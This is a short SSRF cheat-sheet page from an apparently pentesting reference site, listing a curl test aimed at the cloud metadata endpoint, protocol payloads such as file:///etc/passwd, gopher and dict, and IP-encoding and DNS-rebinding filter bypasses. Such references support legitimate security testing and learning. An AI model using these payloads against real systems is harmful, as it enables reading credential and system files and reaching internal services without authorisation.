search
LinkedInGithub
githubEdit

Server-Side Request Forgery (SSRF)

hashtag
SSRF Tests (curl)

curl "http://target.com/api/proxy?url=http://169.254.169.254/"

hashtag
Exploitation:

  • Internal port scanning: Attempting to access internal services and ports on the server's localhost.

  • Accessing restricted endpoints: Bypassing access controls to reach sensitive internal resources.

hashtag
Common Protocols for SSRF:

  • http://127.0.0.1/file:///etc/passwd → Access local files.

  • gopher://dateserver.htb:80/... → Use the gopher protocol to send arbitrary requests.

  • dict://127.0.0.1:11211/info → Query dictionary services.

  • ftp://127.0.0.1:21 → Access FTP servers.

  • file:// → Access local files.

  • php:// → PHP stream wrappers (highly dangerous).

  • data:// → Data encoding.

  • https:// → Accessing internal HTTPS servers.

hashtag
Advanced SSRF Bypass Techniques:

  • URL Encoding: http://127.0.0.1%3A80

  • Double Encoding: http://127.0.0.1%253A80

  • Alternative IP Representations:

    • Octal: http://0177.0.0.1

    • Hexadecimal: http://0x7F.0x00.0x00.0x01

    • IPv6 Abuse: http://[::1]:80

  • DNS Rebinding: Change IP resolutions dynamically.

  • Varying Ports: Bypass filters using different ports.

PreviousServer-Side Includes (SSI) InjectionNextSSTI (Server-Side Template Injection)

Last updated